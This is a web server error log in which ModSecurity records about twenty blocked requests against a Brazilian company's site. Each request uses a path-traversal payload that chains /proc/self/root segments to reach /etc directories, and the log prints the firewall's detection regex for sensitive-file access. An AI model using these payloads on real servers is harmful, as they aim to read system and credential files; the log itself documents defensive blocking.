[Wed Mar 18 05:39:40.503134 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.243.128:34180] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpkzOoXxyEfFpUF8f85mQAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:39:41.801934 2026] [:error] [pid 15051:tid 140411565680384] [client 74.7.243.128:34194] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpkzSmAPhZkrhU8w4k7gAAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:39:43.228528 2026] [:error] [pid 19507:tid 140411540502272] [client 74.7.243.128:34210] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpkz9Y0UrI5A3LftIxjWwAAAZg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:39:48.067567 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.243.128:34216] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpk1Na6ubjKNq_cu4ZisQAAA1g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:39:49.447457 2026] [:error] [pid 11816:tid 140411599251200] [client 74.7.243.128:35172] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpk1ew_le52K8_3pV2tjQAAAhE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:39:52.020056 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.243.128:35180] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpk2OoXxyEfFpUF8f85nwAAAUA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:39:53.397913 2026] [:error] [pid 15826:tid 140411641214720] [client 74.7.243.128:35196] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpk2eoXxyEfFpUF8f85oAAAAUw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:39:54.762070 2026] [:error] [pid 15051:tid 140411616036608] [client 74.7.243.128:35212] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpk2imAPhZkrhU8w4k7iwAAAI8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:39:56.104597 2026] [:error] [pid 31803:tid 140411540502272] [client 74.7.243.128:35222] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpk3OyqAr6etmhZHNqH1gAAAFg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:39:57.463068 2026] [:error] [pid 30077:tid 140411699963648] [client 74.7.243.128:35234] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpk3fu8EFLIOrSqIpvSxQAAAkU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:39:57.523471 2026] [:error] [pid 19507:tid 140411574073088] [client 74.7.241.31:58484] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpk3dY0UrI5A3LftIxjawAAAZQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:39:58.828362 2026] [:error] [pid 30077:tid 140411574073088] [client 74.7.243.128:35248] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpk3vu8EFLIOrSqIpvSxgAAAlQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:40:04.941280 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.243.128:51236] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpk5OoXxyEfFpUF8f85pAAAAUg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:40:07.040505 2026] [:error] [pid 11816:tid 140411616036608] [client 74.7.243.128:51252] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpk5-w_le52K8_3pV2tlAAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:40:08.579123 2026] [:error] [pid 17653:tid 140411733534464] [client 74.7.243.128:51266] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpk6Mdf6f5d65gmYZSeoAAAAsE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:40:12.694614 2026] [:error] [pid 15051:tid 140411616036608] [client 74.7.243.128:47216] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpk7CmAPhZkrhU8w4k7nAAAAI8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:40:13.878451 2026] [:error] [pid 11816:tid 140411699963648] [client 74.7.241.31:56680] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpk7ew_le52K8_3pV2tmgAAAgU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 05:40:14.082512 2026] [:error] [pid 30077:tid 140411632822016] [client 74.7.243.128:47222] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpk7vu8EFLIOrSqIpvSyQAAAk0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:40:15.353914 2026] [:error] [pid 29882:tid 140411548894976] [client 74.7.243.128:47236] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpk70zinOy1jxa1j4ffNAAAARc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:40:16.677373 2026] [:error] [pid 19507:tid 140411658000128] [client 74.7.243.128:47246] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpk8NY0UrI5A3LftIxjcgAAAYo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:40:18.942820 2026] [:error] [pid 30077:tid 140411716749056] [client 74.7.243.128:47250] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpk8vu8EFLIOrSqIpvSywAAAkM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
